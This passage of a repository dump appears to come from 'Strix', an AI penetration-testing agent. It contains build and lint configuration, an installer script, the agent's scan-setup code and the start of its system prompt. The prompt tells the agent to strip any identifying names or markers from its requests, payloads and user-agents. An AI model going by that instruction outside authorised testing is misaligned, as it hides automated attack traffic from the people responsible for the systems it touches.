\"*\", optional = true }\nipython = { version = \"^9.3.0\", optional = true }\nopenhands-aci = { version = \"^0.3.0\", optional = true }\nplaywright = { version = \"^1.48.0\", optional = true }\ngql = { version = \"^3.5.3\", extras = [\"requests\"], optional = true }\npyte = { version = \"^0.8.1\", optional = true }\nlibtmux = { version = \"^0.46.2\", optional = true }\nnumpydoc = { version = \"^1.8.0\", optional = true }\ndefusedxml = \"^0.7.1\"\n\n[tool.poetry.extras]\nvertex = [\"google-cloud-aiplatform\"]\nsandbox = [\"fastapi\", \"uvicorn\", \"ipython\", \"openhands-aci\", \"playwright\", \"gql\", \"pyte\", \"libtmux\", \"numpydoc\"]\n\n[tool.poetry.group.dev.dependencies]\n# Type checking and static analysis\nmypy = \"^1.16.0\"\nruff = \"^0.11.13\"\npyright = \"^1.1.401\"\npylint = \"^3.3.7\"\nbandit = \"^1.8.3\"\n\n# Testing\npytest = \"^8.4.0\"\npytest-asyncio = \"^1.0.0\"\npytest-cov = \"^6.1.1\"\npytest-mock = \"^3.14.1\"\n\n# Development tools\npre-commit = \"^4.2.0\"\nblack = \"^25.1.0\"\nisort = \"^6.0.1\"\n\n# Build tools\npyinstaller = { version = \"^6.17.0\", python = \">=3.12,<3.15\" }\n\n[build-system]\nrequires = [\"poetry-core\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\n# ============================================================================\n# Type Checking Configuration\n# ============================================================================\n\n[tool.mypy]\npython_version = \"3.12\"\nstrict = true\nstrict_optional = true\nwarn_redundant_casts = true\nwarn_unused_ignores = true\nwarn_return_any = true\nwarn_unreachable = true\ndisallow_untyped_defs = true\ndisallow_any_generics = true\ndisallow_subclassing_any = true\ndisallow_untyped_calls = true\ndisallow_incomplete_defs = true\ncheck_untyped_defs = true\ndisallow_untyped_decorators = true\nno_implicit_optional = true\nwarn_unused_configs = true\nshow_error_codes = true\nshow_column_numbers = true\npretty = true\n\n# Allow some flexibility for third-party libraries\n[[tool.mypy.overrides]]\nmodule = [\n \"litellm.*\",\n \"tenacity.*\",\n \"numpydoc.*\",\n \"rich.*\",\n \"IPython.*\",\n \"openhands_aci.*\",\n \"playwright.*\",\n \"uvicorn.*\",\n \"jinja2.*\",\n \"pydantic_settings.*\",\n \"jwt.*\",\n \"httpx.*\",\n \"gql.*\",\n \"textual.*\",\n \"pyte.*\",\n \"libtmux.*\",\n \"pytest.*\",\n \"cvss.*\",\n \"opentelemetry.*\",\n \"scrubadub.*\",\n \"traceloop.*\",\n]\nignore_missing_imports = true\n\n# Relax strict rules for test files (pytest decorators are not fully typed)\n[[tool.mypy.overrides]]\nmodule = [\"tests.*\"]\ndisallow_untyped_decorators = false\ndisallow_untyped_defs = false\n\n# ============================================================================\n# Ruff Configuration (Fast Python Linter & Formatter)\n# ============================================================================\n\n[tool.ruff]\ntarget-version = \"py312\"\nline-length = 100\nextend-exclude = [\n \".git\",\n \".mypy_cache\",\n \".pytest_cache\",\n \".ruff_cache\",\n \"__pycache__\",\n \"build\",\n \"dist\",\n \"migrations\",\n]\n\n[tool.ruff.lint]\n# Enable comprehensive rule sets\nselect = [\n \"E\", # pycodestyle errors\n \"W\", # pycodestyle warnings\n \"F\", # Pyflakes\n \"I\", # isort\n \"N\", # pep8-naming\n \"UP\", # pyupgrade\n \"YTT\", # flake8-2020\n \"S\", # flake8-bandit\n \"BLE\", # flake8-blind-except\n \"FBT\", # flake8-boolean-trap\n \"B\", # flake8-bugbear\n \"A\", # flake8-builtins\n \"COM\", # flake8-commas\n \"C4\", # flake8-comprehensions\n \"DTZ\", # flake8-datetimez\n \"T10\", # flake8-debugger\n \"EM\", # flake8-errmsg\n \"FA\", # flake8-future-annotations\n \"ISC\", # flake8-implicit-str-concat\n \"ICN\", # flake8-import-conventions\n \"G\", # flake8-logging-format\n \"INP\", # flake8-no-pep420\n \"PIE\", # flake8-pie\n \"T20\", # flake8-print\n \"PYI\", # flake8-pyi\n \"PT\", # flake8-pytest-style\n \"Q\", # flake8-quotes\n \"RSE\", # flake8-raise\n \"RET\", # flake8-return\n \"SLF\", # flake8-self\n \"SIM\", # flake8-simplify\n \"TID\", # flake8-tidy-imports\n \"TCH\", # flake8-type-checking\n \"ARG\", # flake8-unused-arguments\n \"PTH\", # flake8-use-pathlib\n \"ERA\", # eradicate\n \"PD\", # pandas-vet\n \"PGH\", # pygrep-hooks\n \"PL\", # Pylint\n \"TRY\", # tryceratops\n \"FLY\", # flynt\n \"PERF\", # Perflint\n \"RUF\", # Ruff-specific rules\n]\n\nignore = [\n \"S101\", # Use of assert\n \"S104\", # Possible binding to all interfaces\n \"S301\", # Use of pickle\n \"COM812\", # Missing trailing comma (handled by formatter)\n \"ISC001\", # Single line implicit string concatenation (handled by formatter)\n \"PLR0913\", # Too many arguments to function call\n \"TRY003\", # Avoid specifying long messages outside the exception class\n \"EM101\", # Exception must not use a string literal\n \"EM102\", # Exception must not use an f-string literal\n \"FBT001\", # Boolean positional arg in function definition\n \"FBT002\", # Boolean default positional argument in function definition\n \"G004\", # Logging statement uses f-string\n \"PLR2004\", # Magic value used in comparison\n \"SLF001\", # Private member accessed\n]\n\n[tool.ruff.lint.per-file-ignores]\n\"tests/**/*.py\" = [\n \"S106\", # Possible hardcoded password\n \"S108\", # Possible insecure usage of temporary file/directory\n \"ARG001\", # Unused function argument\n \"PLR2004\", # Magic value used in comparison\n]\n\"strix/tools/**/*.py\" = [\n \"ARG001\", # Unused function argument (tools may have unused args for interface consistency)\n]\n\n[tool.ruff.lint.isort]\nforce-single-line = false\nlines-after-imports = 2\nknown-first-party = [\"strix\"]\nknown-third-party = [\"fastapi\", \"pydantic\"]\n\n[tool.ruff.lint.pylint]\nmax-args = 8\n\n[tool.ruff.format]\nquote-style = \"double\"\nindent-style = \"space\"\nskip-magic-trailing-comma = false\nline-ending = \"auto\"\n\n# ============================================================================\n# PyRight Configuration (Alternative type checker)\n# ============================================================================\n\n[tool.pyright]\ninclude = [\"strix\"]\nexclude = [\"**/__pycache__\", \"build\", \"dist\"]\npythonVersion = \"3.12\"\npythonPlatform = \"Linux\"\n\ntypeCheckingMode = \"strict\"\nreportMissingImports = true\nreportMissingTypeStubs = false\nreportGeneralTypeIssues = true\nreportPropertyTypeMismatch = true\nreportFunctionMemberAccess = true\nreportMissingParameterType = true\nreportMissingTypeArgument = true\nreportIncompatibleMethodOverride = true\nreportIncompatibleVariableOverride = true\nreportInconsistentConstructor = true\nreportOverlappingOverload = true\nreportConstantRedefinition = true\nreportImportCycles = true\nreportUnusedImport = true\nreportUnusedClass = true\nreportUnusedFunction = true\nreportUnusedVariable = true\nreportDuplicateImport = true\n\n# ============================================================================\n# Black Configuration (Code Formatter)\n# ============================================================================\n\n[tool.black]\nline-length = 100\ntarget-version = ['py312']\ninclude = '\\\\.pyi?$'\nextend-exclude = '''\n/(\n # directories\n \\.eggs\n | \\.git\n | \\.hg\n | \\.mypy_cache\n | \\.tox\n | \\.venv\n | build\n | dist\n)/\n'''\n\n# ============================================================================\n# isort Configuration (Import Sorting)\n# ============================================================================\n\n[tool.isort]\nprofile = \"black\"\nline_length = 100\nmulti_line_output = 3\ninclude_trailing_comma = true\nforce_grid_wrap = 0\nuse_parentheses = true\nensure_newline_before_comments = true\nknown_first_party = [\"strix\"]\nknown_third_party = [\"fastapi\", \"pydantic\", \"litellm\", \"tenacity\"]\n\n# ============================================================================\n# Pytest Configuration\n# ============================================================================\n\n[tool.pytest.ini_options]\nminversion = \"6.0\"\naddopts = [\n \"--strict-markers\",\n \"--strict-config\",\n \"--cov=strix\",\n \"--cov-report=term-missing\",\n \"--cov-report=html\",\n \"--cov-report=xml\",\n]\ntestpaths = [\"tests\"]\npython_files = [\"test_*.py\", \"*_test.py\"]\npython_functions = [\"test_*\"]\npython_classes = [\"Test*\"]\nasyncio_mode = \"auto\"\n\n[tool.coverage.run]\nsource = [\"strix\"]\nomit = [\n \"*/tests/*\",\n \"*/migrations/*\",\n \"*/__pycache__/*\"\n]\n\n[tool.coverage.report]\nexclude_lines = [\n \"pragma: no cover\",\n \"def __repr__\",\n \"if self.debug:\",\n \"if settings.DEBUG\",\n \"raise AssertionError\",\n \"raise NotImplementedError\",\n \"if 0:\",\n \"if __name__ == .__main__.:\",\n \"class .*\\\\bProtocol\\\\):\",\n \"@(abc\\\\.)?abstractmethod\",\n]\n\n# ============================================================================\n# Bandit Configuration (Security Linting)\n# ============================================================================\n\n[tool.bandit]\nexclude_dirs = [\"tests\", \"docs\", \"build\", \"dist\"]\nskips = [\"B101\", \"B601\", \"B404\", \"B603\", \"B607\"] # Skip assert, shell injection, subprocess import and partial path checks\nseverity = \"medium\"\n" }, { "path": "scripts/build.sh", "content": "#!/bin/bash\nset -e\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" && pwd)\"\nPROJECT_ROOT=\"$(cd \"$SCRIPT_DIR/..\" && pwd)\"\n\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nBLUE='\\033[0;34m'\nNC='\\033[0m' # No Color\n\necho -e \"${BLUE}πŸ¦‰ Strix Build Script${NC}\"\necho \"================================\"\n\nOS=\"$(uname -s)\"\nARCH=\"$(uname -m)\"\n\ncase \"$OS\" in\n Linux*) OS_NAME=\"linux\";;\n Darwin*) OS_NAME=\"macos\";;\n MINGW*|MSYS*|CYGWIN*) OS_NAME=\"windows\";;\n *) OS_NAME=\"unknown\";;\nesac\n\ncase \"$ARCH\" in\n x86_64|amd64) ARCH_NAME=\"x86_64\";;\n arm64|aarch64) ARCH_NAME=\"arm64\";;\n *) ARCH_NAME=\"$ARCH\";;\nesac\n\necho -e \"${YELLOW}Platform:${NC} $OS_NAME-$ARCH_NAME\"\n\ncd \"$PROJECT_ROOT\"\n\nif ! command -v poetry &> /dev/null; then\n echo -e \"${RED}Error: Poetry is not installed${NC}\"\n echo \"Please install Poetry first: https://python-poetry.org/docs/#installation\"\n exit 1\nfi\n\necho -e \"\\n${BLUE}Installing dependencies...${NC}\"\npoetry install --with dev\n\nVERSION=$(poetry version -s)\necho -e \"${YELLOW}Version:${NC} $VERSION\"\n\necho -e \"\\n${BLUE}Cleaning previous builds...${NC}\"\nrm -rf build/ dist/\n\necho -e \"\\n${BLUE}Building binary with PyInstaller...${NC}\"\npoetry run pyinstaller strix.spec --noconfirm\n\nRELEASE_DIR=\"dist/release\"\nmkdir -p \"$RELEASE_DIR\"\n\nBINARY_NAME=\"strix-${VERSION}-${OS_NAME}-${ARCH_NAME}\"\n\nif [ \"$OS_NAME\" = \"windows\" ]; then\n if [ ! -f \"dist/strix.exe\" ]; then\n echo -e \"${RED}Build failed: Binary not found${NC}\"\n exit 1\n fi\n BINARY_NAME=\"${BINARY_NAME}.exe\"\n cp \"dist/strix.exe\" \"$RELEASE_DIR/$BINARY_NAME\"\n echo -e \"\\n${BLUE}Creating zip...${NC}\"\n ARCHIVE_NAME=\"${BINARY_NAME%.exe}.zip\"\n\n if command -v 7z &> /dev/null; then\n 7z a \"$RELEASE_DIR/$ARCHIVE_NAME\" \"$RELEASE_DIR/$BINARY_NAME\"\n else\n powershell -Command \"Compress-Archive -Path '$RELEASE_DIR/$BINARY_NAME' -DestinationPath '$RELEASE_DIR/$ARCHIVE_NAME'\"\n fi\n echo -e \"${GREEN}Created:${NC} $RELEASE_DIR/$ARCHIVE_NAME\"\nelse\n if [ ! -f \"dist/strix\" ]; then\n echo -e \"${RED}Build failed: Binary not found${NC}\"\n exit 1\n fi\n cp \"dist/strix\" \"$RELEASE_DIR/$BINARY_NAME\"\n chmod +x \"$RELEASE_DIR/$BINARY_NAME\"\n echo -e \"\\n${BLUE}Creating tarball...${NC}\"\n ARCHIVE_NAME=\"${BINARY_NAME}.tar.gz\"\n tar -czvf \"$RELEASE_DIR/$ARCHIVE_NAME\" -C \"$RELEASE_DIR\" \"$BINARY_NAME\"\n echo -e \"${GREEN}Created:${NC} $RELEASE_DIR/$ARCHIVE_NAME\"\nfi\n\necho -e \"\\n${GREEN}Build successful!${NC}\"\necho \"================================\"\necho -e \"${YELLOW}Binary:${NC} $RELEASE_DIR/$BINARY_NAME\"\n\nSIZE=$(ls -lh \"$RELEASE_DIR/$BINARY_NAME\" | awk '{print $5}')\necho -e \"${YELLOW}Size:${NC} $SIZE\"\n\necho -e \"\\n${BLUE}Testing binary...${NC}\"\n\"$RELEASE_DIR/$BINARY_NAME\" --help > /dev/null 2>&1 && echo -e \"${GREEN}Binary test passed!${NC}\" || echo -e \"${RED}Binary test failed${NC}\"\n\necho -e \"\\n${GREEN}Done!${NC}\"\n" }, { "path": "scripts/install.sh", "content": "#!/usr/bin/env bash\n\nset -euo pipefail\n\nAPP=strix\nREPO=\"usestrix/strix\"\nSTRIX_IMAGE=\"ghcr.io/usestrix/strix-sandbox:0.1.12\"\n\nMUTED='\\033[0;2m'\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nCYAN='\\033[0;36m'\nNC='\\033[0m'\n\nrequested_version=${VERSION:-}\nSKIP_DOWNLOAD=false\n\nraw_os=$(uname -s)\nos=$(echo \"$raw_os\" | tr '[:upper:]' '[:lower:]')\ncase \"$raw_os\" in\n Darwin*) os=\"macos\" ;;\n Linux*) os=\"linux\" ;;\n MINGW*|MSYS*|CYGWIN*) os=\"windows\" ;;\nesac\n\narch=$(uname -m)\nif [[ \"$arch\" == \"aarch64\" ]]; then\n arch=\"arm64\"\nfi\nif [[ \"$arch\" == \"x86_64\" ]]; then\n arch=\"x86_64\"\nfi\n\nif [ \"$os\" = \"macos\" ] && [ \"$arch\" = \"x86_64\" ]; then\n rosetta_flag=$(sysctl -n sysctl.proc_translated 2>/dev/null || echo 0)\n if [ \"$rosetta_flag\" = \"1\" ]; then\n arch=\"arm64\"\n fi\nfi\n\ncombo=\"$os-$arch\"\ncase \"$combo\" in\n linux-x86_64|macos-x86_64|macos-arm64|windows-x86_64)\n ;;\n *)\n echo -e \"${RED}Unsupported OS/Arch: $os/$arch${NC}\"\n exit 1\n ;;\nesac\n\narchive_ext=\".tar.gz\"\nif [ \"$os\" = \"windows\" ]; then\n archive_ext=\".zip\"\nfi\n\ntarget=\"$os-$arch\"\n\nif [ \"$os\" = \"linux\" ]; then\n if ! command -v tar >/dev/null 2>&1; then\n echo -e \"${RED}Error: 'tar' is required but not installed.${NC}\"\n exit 1\n fi\nfi\n\nif [ \"$os\" = \"windows\" ]; then\n if ! command -v unzip >/dev/null 2>&1; then\n echo -e \"${RED}Error: 'unzip' is required but not installed.${NC}\"\n exit 1\n fi\nfi\n\nINSTALL_DIR=$HOME/.strix/bin\nmkdir -p \"$INSTALL_DIR\"\n\nif [ -z \"$requested_version\" ]; then\n specific_version=$(curl -s \"https://api.github.com/repos/$REPO/releases/latest\" | sed -n 's/.*\"tag_name\": *\"v\\([^\"]*\\)\".*/\\1/p')\n if [[ $? -ne 0 || -z \"$specific_version\" ]]; then\n echo -e \"${RED}Failed to fetch version information${NC}\"\n exit 1\n fi\nelse\n specific_version=$requested_version\nfi\n\nfilename=\"$APP-${specific_version}-${target}${archive_ext}\"\nurl=\"https://github.com/$REPO/releases/download/v${specific_version}/$filename\"\n\nprint_message() {\n local level=$1\n local message=$2\n local color=\"\"\n case $level in\n info) color=\"${NC}\" ;;\n success) color=\"${GREEN}\" ;;\n warning) color=\"${YELLOW}\" ;;\n error) color=\"${RED}\" ;;\n esac\n echo -e \"${color}${message}${NC}\"\n}\n\ncheck_existing_installation() {\n local found_paths=()\n while IFS= read -r -d '' path; do\n found_paths+=(\"$path\")\n done < <(which -a strix 2>/dev/null | tr '\\n' '\\0' || true)\n\n if [ ${#found_paths[@]} -gt 0 ]; then\n for path in \"${found_paths[@]}\"; do\n if [[ ! -e \"$path\" ]] || [[ \"$path\" == \"$INSTALL_DIR/strix\"* ]]; then\n continue\n fi\n\n if [[ -n \"$path\" ]]; then\n echo -e \"${MUTED}Found existing strix at: ${NC}$path\"\n\n if [[ \"$path\" == *\".local/bin\"* ]]; then\n echo -e \"${MUTED}Removing old pipx installation...${NC}\"\n if command -v pipx >/dev/null 2>&1; then\n pipx uninstall strix-agent 2>/dev/null || true\n fi\n rm -f \"$path\" 2>/dev/null || true\n elif [[ -L \"$path\" || -f \"$path\" ]]; then\n echo -e \"${MUTED}Removing old installation...${NC}\"\n rm -f \"$path\" 2>/dev/null || true\n fi\n fi\n done\n fi\n}\n\ncheck_version() {\n check_existing_installation\n\n if [[ -x \"$INSTALL_DIR/strix\" ]]; then\n installed_version=$(\"$INSTALL_DIR/strix\" --version 2>/dev/null | awk '{print $2}' || echo \"\")\n if [[ \"$installed_version\" == \"$specific_version\" ]]; then\n print_message info \"${GREEN}βœ“ Strix ${NC}$specific_version${GREEN} already installed${NC}\"\n SKIP_DOWNLOAD=true\n elif [[ -n \"$installed_version\" ]]; then\n print_message info \"${MUTED}Installed: ${NC}$installed_version ${MUTED}β†’ Upgrading to ${NC}$specific_version\"\n fi\n fi\n}\n\ndownload_and_install() {\n print_message info \"\\n${CYAN}πŸ¦‰ Installing Strix${NC} ${MUTED}version: ${NC}$specific_version\"\n print_message info \"${MUTED}Platform: ${NC}$target\\n\"\n\n local tmp_dir=$(mktemp -d)\n cd \"$tmp_dir\"\n\n echo -e \"${MUTED}Downloading...${NC}\"\n curl -# -L -o \"$filename\" \"$url\"\n\n if [ ! -f \"$filename\" ]; then\n echo -e \"${RED}Download failed${NC}\"\n exit 1\n fi\n\n echo -e \"${MUTED}Extracting...${NC}\"\n if [ \"$os\" = \"windows\" ]; then\n unzip -q \"$filename\"\n mv \"strix-${specific_version}-${target}.exe\" \"$INSTALL_DIR/strix.exe\"\n else\n tar -xzf \"$filename\"\n mv \"strix-${specific_version}-${target}\" \"$INSTALL_DIR/strix\"\n chmod 755 \"$INSTALL_DIR/strix\"\n fi\n\n cd - > /dev/null\n rm -rf \"$tmp_dir\"\n\n echo -e \"${GREEN}βœ“ Strix installed to $INSTALL_DIR${NC}\"\n}\n\ncheck_docker() {\n echo \"\"\n if ! command -v docker >/dev/null 2>&1; then\n echo -e \"${YELLOW}⚠ Docker not found${NC}\"\n echo -e \"${MUTED}Strix requires Docker to run the security sandbox.${NC}\"\n echo -e \"${MUTED}Please install Docker: ${NC}https://docs.docker.com/get-docker/\"\n echo \"\"\n return 1\n fi\n\n if ! docker info >/dev/null 2>&1; then\n echo -e \"${YELLOW}⚠ Docker daemon not running${NC}\"\n echo -e \"${MUTED}Please start Docker and run: ${NC}docker pull $STRIX_IMAGE\"\n echo \"\"\n return 1\n fi\n\n echo -e \"${MUTED}Checking for sandbox image...${NC}\"\n if docker image inspect \"$STRIX_IMAGE\" >/dev/null 2>&1; then\n echo -e \"${GREEN}βœ“ Sandbox image already available${NC}\"\n else\n echo -e \"${MUTED}Pulling sandbox image (this may take a few minutes)...${NC}\"\n if docker pull \"$STRIX_IMAGE\"; then\n echo -e \"${GREEN}βœ“ Sandbox image pulled successfully${NC}\"\n else\n echo -e \"${YELLOW}⚠ Failed to pull sandbox image${NC}\"\n echo -e \"${MUTED}You can pull it manually later: ${NC}docker pull $STRIX_IMAGE\"\n fi\n fi\n return 0\n}\n\nadd_to_path() {\n local config_file=$1\n local command=$2\n\n if grep -Fxq \"$command\" \"$config_file\" 2>/dev/null; then\n print_message info \"${MUTED}PATH already configured in ${NC}$config_file\"\n elif [[ -w $config_file ]]; then\n echo -e \"\\n# strix\" >> \"$config_file\"\n echo \"$command\" >> \"$config_file\"\n print_message info \"${MUTED}Successfully added ${NC}strix ${MUTED}to \\$PATH in ${NC}$config_file\"\n else\n print_message warning \"Manually add the directory to $config_file (or similar):\"\n print_message info \" $command\"\n fi\n}\n\nsetup_path() {\n XDG_CONFIG_HOME=${XDG_CONFIG_HOME:-$HOME/.config}\n current_shell=$(basename \"$SHELL\")\n\n case $current_shell in\n fish)\n config_files=\"$HOME/.config/fish/config.fish\"\n ;;\n zsh)\n config_files=\"${ZDOTDIR:-$HOME}/.zshrc ${ZDOTDIR:-$HOME}/.zshenv $XDG_CONFIG_HOME/zsh/.zshrc $XDG_CONFIG_HOME/zsh/.zshenv\"\n ;;\n bash)\n config_files=\"$HOME/.bashrc $HOME/.bash_profile $HOME/.profile $XDG_CONFIG_HOME/bash/.bashrc $XDG_CONFIG_HOME/bash/.bash_profile\"\n ;;\n ash)\n config_files=\"$HOME/.ashrc $HOME/.profile /etc/profile\"\n ;;\n sh)\n config_files=\"$HOME/.ashrc $HOME/.profile /etc/profile\"\n ;;\n *)\n config_files=\"$HOME/.bashrc $HOME/.bash_profile $XDG_CONFIG_HOME/bash/.bashrc $XDG_CONFIG_HOME/bash/.bash_profile\"\n ;;\n esac\n\n config_file=\"\"\n for file in $config_files; do\n if [[ -f $file ]]; then\n config_file=$file\n break\n fi\n done\n\n if [[ -z $config_file ]]; then\n print_message warning \"No config file found for $current_shell. You may need to manually add to PATH:\"\n print_message info \" export PATH=$INSTALL_DIR:\\$PATH\"\n elif [[ \":$PATH:\" != *\":$INSTALL_DIR:\"* ]]; then\n case $current_shell in\n fish)\n add_to_path \"$config_file\" \"fish_add_path $INSTALL_DIR\"\n ;;\n zsh)\n add_to_path \"$config_file\" \"export PATH=$INSTALL_DIR:\\$PATH\"\n ;;\n bash)\n add_to_path \"$config_file\" \"export PATH=$INSTALL_DIR:\\$PATH\"\n ;;\n ash)\n add_to_path \"$config_file\" \"export PATH=$INSTALL_DIR:\\$PATH\"\n ;;\n sh)\n add_to_path \"$config_file\" \"export PATH=$INSTALL_DIR:\\$PATH\"\n ;;\n *)\n export PATH=$INSTALL_DIR:$PATH\n print_message warning \"Manually add the directory to $config_file (or similar):\"\n print_message info \" export PATH=$INSTALL_DIR:\\$PATH\"\n ;;\n esac\n fi\n\n if [ -n \"${GITHUB_ACTIONS-}\" ] && [ \"${GITHUB_ACTIONS}\" == \"true\" ]; then\n echo \"$INSTALL_DIR\" >> \"$GITHUB_PATH\"\n print_message info \"Added $INSTALL_DIR to \\$GITHUB_PATH\"\n fi\n}\n\nverify_installation() {\n export PATH=\"$INSTALL_DIR:$PATH\"\n\n local which_strix=$(which strix 2>/dev/null || echo \"\")\n\n if [[ \"$which_strix\" != \"$INSTALL_DIR/strix\" && \"$which_strix\" != \"$INSTALL_DIR/strix.exe\" ]]; then\n if [[ -n \"$which_strix\" ]]; then\n echo -e \"${YELLOW}⚠ Found conflicting strix at: ${NC}$which_strix\"\n echo -e \"${MUTED}Attempting to remove...${NC}\"\n\n if rm -f \"$which_strix\" 2>/dev/null; then\n echo -e \"${GREEN}βœ“ Removed conflicting installation${NC}\"\n else\n echo -e \"${YELLOW}Could not remove automatically.${NC}\"\n echo -e \"${MUTED}Please remove manually: ${NC}rm $which_strix\"\n fi\n fi\n fi\n\n if [[ -x \"$INSTALL_DIR/strix\" ]]; then\n local version=$(\"$INSTALL_DIR/strix\" --version 2>/dev/null | awk '{print $2}' || echo \"unknown\")\n echo -e \"${GREEN}βœ“ Strix ${NC}$version${GREEN} ready${NC}\"\n fi\n}\n\ncheck_version\nif [ \"$SKIP_DOWNLOAD\" = false ]; then\n download_and_install\nfi\nsetup_path\nverify_installation\ncheck_docker\n\necho \"\"\necho -e \"${CYAN}\"\necho \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—\"\necho \" β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•\"\necho \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•”β• \"\necho \" β•šβ•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— \"\necho \" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•—\"\necho \" β•šβ•β•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β• β•šβ•β•\"\necho -e \"${NC}\"\necho -e \"${MUTED} AI Penetration Testing Agent${NC}\"\necho \"\"\necho -e \"${MUTED}To get started:${NC}\"\necho \"\"\necho -e \" ${CYAN}1.${NC} Get your Strix API key:\"\necho -e \" ${MUTED}https://models.strix.ai${NC}\"\necho \"\"\necho -e \" ${CYAN}2.${NC} Set your environment:\"\necho -e \" ${MUTED}export LLM_API_KEY='your-api-key'${NC}\"\necho -e \" ${MUTED}export STRIX_LLM='strix/gpt-5'${NC}\"\necho \"\"\necho -e \" ${CYAN}3.${NC} Run a penetration test:\"\necho -e \" ${MUTED}strix --target https://example.com${NC}\"\necho \"\"\necho -e \"${MUTED}For more information visit ${NC}https://strix.ai\"\necho -e \"${MUTED}Supported models ${NC}https://docs.strix.ai/llm-providers/overview\"\necho -e \"${MUTED}Join our community ${NC}https://discord.gg/strix-ai\"\necho \"\"\n\necho -e \"${YELLOW}β†’${NC} Run ${MUTED}source ~/.$(basename $SHELL)rc${NC} or open a new terminal\"\necho \"\"\n" }, { "path": "strix/__init__.py", "content": "" }, { "path": "strix/agents/StrixAgent/__init__.py", "content": "from .strix_agent import StrixAgent\n\n\n__all__ = [\"StrixAgent\"]\n" }, { "path": "strix/agents/StrixAgent/strix_agent.py", "content": "from typing import Any\n\nfrom strix.agents.base_agent import BaseAgent\nfrom strix.llm.config import LLMConfig\n\n\nclass StrixAgent(BaseAgent):\n max_iterations = 300\n\n def __init__(self, config: dict[str, Any]):\n default_skills = []\n\n state = config.get(\"state\")\n if state is None or (hasattr(state, \"parent_id\") and state.parent_id is None):\n default_skills = [\"root_agent\"]\n\n self.default_llm_config = LLMConfig(skills=default_skills)\n\n super().__init__(config)\n\n async def execute_scan(self, scan_config: dict[str, Any]) -> dict[str, Any]: # noqa: PLR0912\n user_instructions = scan_config.get(\"user_instructions\", \"\")\n targets = scan_config.get(\"targets\", [])\n\n repositories = []\n local_code = []\n urls = []\n ip_addresses = []\n\n for target in targets:\n target_type = target[\"type\"]\n details = target[\"details\"]\n workspace_subdir = details.get(\"workspace_subdir\")\n workspace_path = f\"/workspace/{workspace_subdir}\" if workspace_subdir else \"/workspace\"\n\n if target_type == \"repository\":\n repo_url = details[\"target_repo\"]\n cloned_path = details.get(\"cloned_repo_path\")\n repositories.append(\n {\n \"url\": repo_url,\n \"workspace_path\": workspace_path if cloned_path else None,\n }\n )\n\n elif target_type == \"local_code\":\n original_path = details.get(\"target_path\", \"unknown\")\n local_code.append(\n {\n \"path\": original_path,\n \"workspace_path\": workspace_path,\n }\n )\n\n elif target_type == \"web_application\":\n urls.append(details[\"target_url\"])\n elif target_type == \"ip_address\":\n ip_addresses.append(details[\"target_ip\"])\n\n task_parts = []\n\n if repositories:\n task_parts.append(\"\\n\\nRepositories:\")\n for repo in repositories:\n if repo[\"workspace_path\"]:\n task_parts.append(f\"- {repo['url']} (available at: {repo['workspace_path']})\")\n else:\n task_parts.append(f\"- {repo['url']}\")\n\n if local_code:\n task_parts.append(\"\\n\\nLocal Codebases:\")\n task_parts.extend(\n f\"- {code['path']} (available at: {code['workspace_path']})\" for code in local_code\n )\n\n if urls:\n task_parts.append(\"\\n\\nURLs:\")\n task_parts.extend(f\"- {url}\" for url in urls)\n\n if ip_addresses:\n task_parts.append(\"\\n\\nIP Addresses:\")\n task_parts.extend(f\"- {ip}\" for ip in ip_addresses)\n\n task_description = \" \".join(task_parts)\n\n if user_instructions:\n task_description += f\"\\n\\nSpecial instructions: {user_instructions}\"\n\n return await self.agent_loop(task=task_description)\n" }, { "path": "strix/agents/StrixAgent/system_prompt.jinja", "content": "You are Strix, an advanced AI cybersecurity agent developed by OmniSecure Labs. Your purpose is to conduct security assessments, penetration testing, and vulnerability discovery.\nYou follow all instructions and rules provided to you exactly as written in the system prompt at all times.\n\n\n- Security assessment and vulnerability scanning\n- Penetration testing and exploitation\n- Web application security testing\n- Security analysis and reporting\n\n\n\nCLI OUTPUT:\n- You may use simple markdown: **bold**, *italic*, `code`, ~~strikethrough~~, [links](url), and # headers\n- Do NOT use complex markdown like bullet lists, numbered lists, or tables\n- Use line breaks and indentation for structure\n- NEVER use \"Strix\" or any identifiable names/markers in HTTP requests, payloads, user-agents, or any inputs\n\nINTER-AGENT MESSAGES:\n- NEVER echo inter_agent_message or agent_completion_report blocks that are sent to you in your output.\n- Process these internally without displaying them\n- NEVER echo agent_identity blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.\n- Minimize inter-agent messaging: only message when essential for coordination or assistance; avoid routine status updates; batch non-urgent information; prefer parent/child completion flows and shared artifacts over messaging\n\n{% if interactive %}\nINTERACTIVE BEHAVIOR:\n- You are in an interactive conversation with a user\n- CRITICAL: A message WITHOUT a tool call IMMEDIATELY STOPS execution and waits for user input. This means:\n - NEVER narrate what you are 